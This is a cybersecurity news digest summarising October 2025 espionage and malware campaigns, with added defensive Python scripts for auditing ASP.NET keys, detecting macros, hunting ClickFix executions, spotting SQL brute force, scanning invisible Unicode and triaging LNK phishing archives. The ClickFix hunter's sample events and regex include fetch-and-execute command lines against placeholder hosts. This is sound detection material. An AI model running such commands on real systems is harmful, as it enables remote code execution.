Cyber Digests

just real cyber news

Latest Cyber News

Curated cybersecurity intelligence • Updated continuously

F5 disclosed a breach in which unidentified threat actors stole files containing BIG-IP source code and information about undisclosed BIG-IP vulnerabilities. The attackers used BRICKSTORM malware, attributed to the China-nexus espionage group tracked as UNC5221. The breach, discovered on August 9, 2025, had been ongoing for at least 12 months. Over 680,000 F5 BIG-IP devices are visible on the public internet, with the majority located in a single country, followed by Germany, France, Japan, and one other.

Latest mentioned: 10-22
Earliest mentioned: 10-22

Researchers from Elastic Security Labs and Texas A&M University System Cybersecurity uncovered a widespread campaign by a Chinese-speaking threat actor exploiting misconfigured Microsoft IIS servers. The attackers deployed a malicious IIS module called TOLLBOOTH, a modified Hidden rootkit, and a webshell framework forked from Godzilla to maintain persistence and hide their operations. The campaign, designated REF3927, gained its foothold through ASP.NET ViewState deserialization attacks made possible by leaked or publicly known machine keys, and affected 571 servers across various industries.

Latest mentioned: 10-23
Earliest mentioned: 10-20
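
The misconfiguration behind REF3927 is checkable from the server side. The following is an added example (not Elastic's tooling) that audits a web.config for the conditions that make ViewState forgery possible: a static validationKey that appears on a list of disclosed keys, a weak validation algorithm, or ViewState MAC turned off. The "known-leaked" hash set and both sample configs are constructed here for illustration.

```python
"""Audit an ASP.NET web.config for machineKey weaknesses (added example,
not Elastic's tooling). A static key that was ever published lets anyone
sign ViewState and trigger deserialization on the server."""
import hashlib
import xml.etree.ElementTree as ET

# Constructed placeholder: SHA-256 of a key we pretend has been disclosed.
# Populate from a real list of leaked keys; store hashes, not the keys.
KNOWN_LEAKED_KEY_HASHES = {
    hashlib.sha256(b"0123456789ABCDEF" * 8).hexdigest(),
}
WEAK_VALIDATION = {"md5", "sha1", "3des"}


def audit_web_config(xml_text: str) -> list[str]:
    """Return findings for every <machineKey> and <pages> element found."""
    findings = []
    root = ET.fromstring(xml_text)
    for mk in root.iter("machineKey"):
        vkey = mk.get("validationKey", "AutoGenerate")
        algo = mk.get("validation", "HMACSHA256").lower()
        if not vkey.lower().startswith("autogenerate"):
            if hashlib.sha256(vkey.encode()).hexdigest() in KNOWN_LEAKED_KEY_HASHES:
                findings.append("validationKey is a known-disclosed key: rotate immediately")
            else:
                findings.append("static validationKey: rotate if it was ever copied from a public source")
        if algo in WEAK_VALIDATION:
            findings.append(f"weak ViewState validation algorithm: {algo}")
    for pages in root.iter("pages"):
        if pages.get("enableViewStateMac", "true").lower() == "false":
            findings.append("enableViewStateMac=false: unsigned ViewState is deserialized")
    return findings


# Constructed sample configs: a weak one and a hardened one.
WEAK_CONFIG = """<?xml version="1.0"?>
<configuration>
  <system.web>
    <machineKey validationKey="{key}" decryptionKey="{key}"
                validation="SHA1" decryption="AES"/>
    <pages enableViewStateMac="false"/>
  </system.web>
</configuration>""".format(key="0123456789ABCDEF" * 8)

HARDENED_CONFIG = """<?xml version="1.0"?>
<configuration>
  <system.web>
    <machineKey validationKey="AutoGenerate,IsolateApps"
                decryptionKey="AutoGenerate,IsolateApps"
                validation="HMACSHA256" decryption="AES"/>
  </system.web>
</configuration>"""

if __name__ == "__main__":
    for finding in audit_web_config(WEAK_CONFIG):
        print("WEAK:", finding)
    print("hardened findings:", audit_web_config(HARDENED_CONFIG))
```

A static key is only a problem when it has left the server (pasted from a forum, committed to a repository, shared across a web farm and then leaked), which is why the script stores hashes of disclosed keys rather than the keys themselves. Rotating a key invalidates existing ViewState and forms-auth tickets, so plan the rotation.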

The state-sponsored hacker group MuddyWater has targeted over 100 government entities in a recent phishing campaign. Starting August 19, the group used a compromised email account, accessed via NordVPN, to send malicious Word documents carrying VBA macros. The macros deployed version 4 of the Phoenix backdoor, which gathers system information and connects to a command-and-control server. Most targets were embassies and diplomatic missions, and the attack was likely aimed at gathering intelligence from compromised systems.

Latest mentioned: 10-22
Earliest mentioned: 10-22

The Bitter APT group, also known as APT-Q-37, has been discovered using malicious Office macros and a previously undocumented WinRAR vulnerability to deploy a C# backdoor. This dual-pronged attack targets high-value sectors such as government, electric power, and military. The group, believed to operate from a South Asian base, has been active for several years, conducting highly targeted espionage operations. Researchers warn of the group's evolving tactics and urge organizations to adopt multi-layered defense strategies, including disabling macros and applying patches.

Latest mentioned: 10-22
Earliest mentioned: 10-22
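
Both the MuddyWater and Bitter campaigns above start with a macro-bearing Office document. The following added example (not from either report) shows the check a mail-gateway or IR script can make: open the OOXML container and look for a VBA project, because the file extension is attacker-controlled and a .docx name proves nothing. The sample documents are constructed minimal containers, not files from the campaigns.

```python
"""Detect VBA projects inside Office documents regardless of file extension
(added example). OOXML files are ZIP containers; a VBA project is stored as
vbaProject.bin under word/, xl/ or ppt/."""
import io
import zipfile

MACRO_EXTENSIONS = {".docm", ".dotm", ".xlsm", ".xltm", ".pptm", ".potm", ".ppam"}


def inspect_office_blob(data: bytes) -> dict:
    """Return what the container reveals: whether it is OOXML and whether it carries VBA."""
    info = {"ooxml": False, "vba_parts": [], "macro_content_type": False}
    if not data.startswith(b"PK"):
        return info
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return info
    names = zf.namelist()
    if "[Content_Types].xml" not in names:
        return info
    info["ooxml"] = True
    info["vba_parts"] = [n for n in names if n.lower().endswith("vbaproject.bin")]
    ctypes = zf.read("[Content_Types].xml").decode("utf-8", "replace").lower()
    info["macro_content_type"] = "macroenabled" in ctypes or "vbaproject" in ctypes
    return info


def triage_attachment(filename: str, data: bytes) -> str:
    """Return a one-line verdict for a mail-gateway or IR triage script."""
    ext = "." + filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    info = inspect_office_blob(data)
    if not info["ooxml"]:
        return "not-ooxml"
    if info["vba_parts"]:
        if ext in MACRO_EXTENSIONS:
            return "macro-enabled (declared): block or detonate"
        return f"macro-enabled (hidden behind {ext or 'no extension'}): block"
    return "ooxml without VBA"


def build_sample_docx(with_vba: bool) -> bytes:
    """Constructed minimal OOXML container; not a real document from either campaign."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        ct = ('<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
              '<Default Extension="xml" ContentType="application/xml"/>')
        if with_vba:
            ct += '<Default Extension="bin" ContentType="application/vnd.ms-office.vbaProject"/>'
            zf.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0 constructed stub")
        zf.writestr("[Content_Types].xml", ct + "</Types>")
        zf.writestr("word/document.xml", "<w:document/>")
    return buf.getvalue()


if __name__ == "__main__":
    print(triage_attachment("invoice.docx", build_sample_docx(True)))
    print(triage_attachment("invoice.docm", build_sample_docx(True)))
    print(triage_attachment("invoice.docx", build_sample_docx(False)))
```

This only covers OOXML; legacy binary formats (.doc/.xls, OLE2 containers) need a different parser such as olevba. The "disable macros" advice in the Bitter item is enforced on the endpoint; this check catches the document before it gets there.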

Google’s Threat Intelligence Group (GTIG) has uncovered a significant evolution in the operations of COLDRIVER, a state-sponsored threat actor. Within days of the public disclosure of its LOSTKEYS malware, COLDRIVER deployed a new malware ecosystem dubbed the 'ROBOT' family. This includes NOROBOT, YESROBOT, and MAYBEROBOT, delivered through an updated ClickFix lure disguised as a CAPTCHA test. The group's swift response demonstrates a well-resourced capability to rebuild and rearm after exposure. The ROBOT-linked malware has been deployed more aggressively than in previous campaigns, highlighting COLDRIVER's persistent effort to evade detection while targeting high-value entities.

Latest mentioned: 10-22
Earliest mentioned: 10-20
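
A ClickFix lure ends with the victim pasting a command into the Win+R dialog, so the detection opportunity is in process-creation telemetry rather than in the lure page. The following added example (not GTIG's detection logic) scores Sysmon-style events: a scripting host spawned by explorer.exe whose command line fetches and executes remote content. The events and the 203.0.113.0/24 addresses are constructed; the ROBOT family's actual command lines are not reproduced here.

```python
"""Flag ClickFix-style executions in process-creation telemetry (added
example). The tell-tale is a script host or downloader spawned by
explorer.exe with a command line that fetches and runs remote content."""
import json
import re

RUN_DIALOG_PARENTS = {"explorer.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe", "curl.exe", "msiexec.exe"}
# Fetch-and-execute fragments common in pasted one-liners; extend for your telemetry.
REMOTE_EXEC = re.compile(
    r"(?i)(\biwr\b|\birm\b|invoke-webrequest|invoke-expression|\biex\b|"
    r"downloadstring|mshta\s+https?://|curl\s+.*https?://|msiexec\s+.*https?://)"
)
HIDE = re.compile(r"(?i)-w(indowstyle)?\s+hidden|-nop\b|-ep\s+bypass|-enc\w*\s")


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: dict) -> int:
    """0 = no interest; higher = stronger ClickFix indicator."""
    if basename(ev.get("ParentImage", "")) not in RUN_DIALOG_PARENTS:
        return 0
    if basename(ev.get("Image", "")) not in SCRIPT_HOSTS:
        return 0
    cmd = ev.get("CommandLine", "")
    score = 1                      # explorer -> script host alone is weak evidence
    if REMOTE_EXEC.search(cmd):
        score += 2
    if HIDE.search(cmd):
        score += 1
    return score


def hunt(jsonl: str, threshold: int = 3) -> list[dict]:
    """Return events at or above threshold, with their score attached."""
    hits = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        s = score_event(ev)
        if s >= threshold:
            hits.append({**ev, "score": s})
    return hits


# Constructed Sysmon-style Event ID 1 records (TEST-NET-3 addresses, not real C2).
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell -w hidden -c "iwr http://203.0.113.10/verify | iex"'},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://203.0.113.10/captcha.hta"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -c Get-Process"},
    {"ParentImage": r"C:\Program Files\Outlook\outlook.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c curl http://203.0.113.10/x.exe -o x.exe"},
])

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit["score"], hit["CommandLine"])
```

The rule is deliberately narrow: the last sample event (Outlook spawning cmd with curl) is also worth an alert, but under a different rule. On Windows the Run dialog also records what was pasted under HKCU\...\Explorer\RunMRU, which corroborates a hit from the process tree.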

The PassiveNeuron cyberespionage campaign has re-emerged after a six-month hiatus, targeting government, financial, and industrial organizations with sophisticated malware implants. The campaign primarily exploits Microsoft SQL servers to gain initial access, leveraging vulnerabilities or brute-forcing credentials. Once inside, attackers deploy ASPX web shells and adapt their techniques to evade detection. The campaign employs custom malware like Neursite and NeuralExecutor, along with the Cobalt Strike framework, demonstrating remarkable adaptability and persistence.

Latest mentioned: 10-21
Earliest mentioned: 10-21
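
The PassiveNeuron entry path (brute-forced or exploited MSSQL, then command execution and a web shell) leaves a readable trail in the SQL Server ERRORLOG. The following added example (not Kaspersky's or anyone's published detection) parses a constructed ERRORLOG excerpt in the real line format, flags a burst of failed logins from one client, and flags xp_cmdshell being switched on.

```python
"""Spot the PassiveNeuron-style entry path in a SQL Server ERRORLOG: a burst
of failed logins from one client followed by xp_cmdshell being enabled
(added example; the log lines are constructed in the real ERRORLOG format)."""
import re
from collections import defaultdict
from datetime import datetime

FAILED_LOGIN = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d)\.\d+\s+Logon\s+"
    r"Login failed for user '(?P<user>[^']*)'.*\[CLIENT: (?P<ip>[^\]]+)\]"
)
XP_CMDSHELL_ON = re.compile(r"Configuration option 'xp_cmdshell' changed from 0 to 1")


def analyse_errorlog(text: str, threshold: int = 5, window_s: int = 60) -> list[str]:
    """Return alerts: one per client IP exceeding threshold failures within
    window_s seconds, plus one if xp_cmdshell was enabled."""
    failures = defaultdict(list)                 # ip -> [(timestamp, user)]
    alerts = []
    for line in text.splitlines():
        m = FAILED_LOGIN.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
            failures[m["ip"]].append((ts, m["user"]))
        elif XP_CMDSHELL_ON.search(line):
            alerts.append("xp_cmdshell enabled: OS command execution from SQL is now possible")
    for ip, events in failures.items():
        events.sort()
        for i in range(len(events)):            # sliding window over sorted timestamps
            j = i
            while j + 1 < len(events) and (events[j + 1][0] - events[i][0]).total_seconds() <= window_s:
                j += 1
            if j - i + 1 >= threshold:
                users = ", ".join(sorted({u for _, u in events[i:j + 1]}))
                alerts.append(f"brute force from {ip}: {j - i + 1} failed logins within {window_s}s (users: {users})")
                break
    return alerts


# Constructed ERRORLOG excerpt. Error 18456 state 8 = wrong password.
SAMPLE_ERRORLOG = """\
2025-10-21 03:14:07.12 Logon       Error: 18456, Severity: 14, State: 8.
2025-10-21 03:14:07.12 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.10]
2025-10-21 03:14:09.40 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.10]
2025-10-21 03:14:11.02 Logon       Login failed for user 'admin'. Reason: Could not find a login matching the name provided. [CLIENT: 203.0.113.10]
2025-10-21 03:14:13.77 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.10]
2025-10-21 03:14:15.31 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.10]
2025-10-21 03:14:18.09 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.10]
2025-10-21 03:20:44.55 Logon       Login failed for user 'backup'. Reason: Password did not match that for the login provided. [CLIENT: 198.51.100.7]
2025-10-21 03:31:02.18 spid61      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
"""

if __name__ == "__main__":
    for alert in analyse_errorlog(SAMPLE_ERRORLOG):
        print(alert)
```

Failed logins are only written when login auditing is enabled (the default logs failures but not successes), so the successful login that ends a brute-force run is invisible unless success auditing is on. A web shell dropped after this point is best caught on the IIS side, by watching for new .aspx files written by the SQL Server service account.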

A new supply-chain attack, GlassWorm, is targeting developers through the Open VSX registry and the Microsoft Visual Studio Marketplace. The malware hides its code behind invisible Unicode characters and spreads using stolen account credentials. It uses the Solana blockchain for command-and-control, making takedown difficult. Researchers estimate the malicious extensions have been installed around 35,800 times; the payload steals credentials for various platforms and cryptocurrency wallet data.

Latest mentioned: 10-20
Earliest mentioned: 10-20
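
Invisible Unicode in source is mechanically detectable: the characters render as nothing in an editor or a diff, but the interpreter sees every code point. The following added example (not GlassWorm's encoding or the researchers' tooling) scans extension source for format characters (category Cf, which includes zero-width characters and the Tags block U+E0000..U+E007F) and variation selectors, and decodes a Tags-block run back to ASCII. The sample JavaScript is constructed.

```python
"""Find invisible Unicode in extension source (added example; the scan is
generic, not a reproduction of GlassWorm's specific encoding)."""
import unicodedata

VARIATION_SELECTORS = set(range(0xFE00, 0xFE10)) | set(range(0xE0100, 0xE01F0))
TAG_BLOCK = range(0xE0000, 0xE0080)


def is_invisible(ch: str) -> bool:
    return unicodedata.category(ch) == "Cf" or ord(ch) in VARIATION_SELECTORS


def scan_source(text: str) -> list[tuple[int, int, str, str]]:
    """Return (line, column, 'U+XXXX', name) for every invisible code point."""
    hits = []
    for ln, line in enumerate(text.splitlines(), 1):
        for col, ch in enumerate(line, 1):
            if is_invisible(ch):
                hits.append((ln, col, f"U+{ord(ch):04X}", unicodedata.name(ch, "<unnamed>")))
    return hits


def decode_tag_run(text: str) -> str:
    """Tags-block characters are ASCII shifted by 0xE0000; map them back so an
    analyst can read what was hidden."""
    return "".join(chr(ord(c) - 0xE0000) for c in text if ord(c) in TAG_BLOCK)


# Constructed sample: a tiny extension entry point with three kinds of
# invisible characters planted in it.
HIDDEN = "".join(chr(0xE0000 + ord(c)) for c in "fetch")   # 5 tag characters
SAMPLE_JS = (
    "function activate(context) {\n"
    "  const vers\u200bion = '1.0';\n"        # zero-width space inside an identifier
    "  // done \u2714\ufe0f\n"                 # VS16 after a check mark (legitimate emoji use)
    f"  const marker = '{HIDDEN}';\n"          # tags-encoded text, renders as ''
    "}\n"
)

if __name__ == "__main__":
    for hit in scan_source(SAMPLE_JS):
        print(hit)
    print("hidden tag run:", decode_tag_run(SAMPLE_JS))
```

Not every hit is malicious: ZWJ inside emoji sequences and bidi marks in localized strings are legitimate, so treat the output as a review queue. Run it over the published .vsix contents (after unzipping), not the repository, since the marketplace package is what actually executes on developers' machines.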

FortiGuard Labs has uncovered a sophisticated cross-regional campaign by Winos 4.0 operators, initially targeting users with phishing PDFs disguised as official documents. The campaign has evolved, using custom domains and multi-stage loaders to deliver the HoldingHands payload. The malware employs DLL sideloading and privilege escalation techniques, making detection challenging. The latest variant includes a new C2 task that updates the server IP address via a registry entry, showcasing the group's growing sophistication. Analysts have linked the infrastructure to new campaigns, highlighting the threat actors' reliance on phishing lures and layered evasion tactics.

Latest mentioned: 10-20
Earliest mentioned: 10-18

Researchers at SEQRITE Labs have uncovered a targeted spear-phishing campaign aimed at organizations in the automobile and e-commerce sectors. The operation, active since early October 2025, deploys a previously undocumented .NET-based backdoor dubbed CAPI, designed for credential theft, system reconnaissance, and persistent access. The attack chain uses tax-related decoy documents to lure employees and executes the payload through rundll32.exe, a legitimate Windows binary, to evade detection. The infection begins with a malicious ZIP archive named "Payroll Recalculation as of October 1, 2025". Inside the ZIP, analysts found both LNK and PDF files, a common spear-phishing tactic that disguises an executable shortcut as a legitimate business document.

Latest mentioned: 10-20
Earliest mentioned: 10-18
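
The ZIP-with-LNK-and-decoy pattern is easy to triage without opening anything. The following added example (not SEQRITE's analysis tooling) identifies shortcut files by their Shell Link header rather than their name, flags double extensions, and lists which Windows binaries the shortcut's string data references. The archive and the shortcut in it are constructed stand-ins, not the campaign's samples.

```python
"""Triage a phishing ZIP for shortcut files and the LOLBins they invoke
(added example; archive and LNK are constructed). A .lnk is identified by
its header, since the name is attacker-chosen and often ends in .pdf.lnk."""
import io
import zipfile

# Shell Link header: HeaderSize 0x4C + LinkCLSID {00021401-0000-0000-C000-000000000046}
LNK_MAGIC = bytes.fromhex("4c000000" "0114020000000000c000000000000046")
LOLBINS = ("rundll32", "mshta", "powershell", "cmd.exe", "wscript", "cscript",
           "regsvr32", "msiexec", "certutil", "conhost")


def lolbin_strings(blob: bytes) -> list[str]:
    """LNK string data is UTF-16LE; check both byte alignments plus raw ASCII."""
    views = [blob.decode("latin-1").lower()]
    for off in (0, 1):
        views.append(blob[off:].decode("utf-16-le", "ignore").lower())
    return sorted({name for name in LOLBINS if any(name in v for v in views)})


def triage_zip(data: bytes) -> list[dict]:
    """One record per entry: name, real-LNK flag, double-extension flag, LOLBins referenced."""
    records = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            blob = zf.read(info)
            name = info.filename
            is_lnk = blob.startswith(LNK_MAGIC)
            records.append({
                "name": name,
                "is_lnk": is_lnk,
                "double_ext": name.lower().count(".") > 1
                              and name.lower().endswith((".lnk", ".exe", ".scr")),
                "lolbins": lolbin_strings(blob) if is_lnk else [],
            })
    return records


def build_sample_zip() -> bytes:
    """Constructed archive: a decoy PDF and a shortcut whose arguments call rundll32."""
    args = r"C:\Windows\System32\rundll32.exe %TEMP%\stage.dll,Run"
    # 76-byte header (magic + zero padding), then UTF-16LE string data.
    fake_lnk = LNK_MAGIC + b"\x00" * 56 + args.encode("utf-16-le")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Payroll Recalculation as of October 1, 2025.pdf.lnk", fake_lnk)
        zf.writestr("Payroll Recalculation.pdf", b"%PDF-1.4\n% decoy\n")
    return buf.getvalue()


if __name__ == "__main__":
    for rec in triage_zip(build_sample_zip()):
        print(rec)
```

For a real shortcut, a full parser (LinkFlags, LinkTargetIDList, then the StringData fields) gives the exact target and arguments; the string search here is the quick first pass that tells you whether the archive deserves that effort.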

A new report from NTT Security Japan highlights the evolved malware family OtterCandy, attributed to the WaterPlum group. This campaign showcases advanced multi-platform intrusion capabilities, targeting Windows, macOS, and Linux. OtterCandy, built with Node.js, functions as both a Remote Access Trojan (RAT) and an Information Stealer, combining elements from earlier espionage tools. The malware's latest update enhances its persistence and data-theft capabilities, including an anti-forensic module that removes traces after execution.

Latest mentioned: 10-20
Earliest mentioned: 10-16
10/22 · 212 articles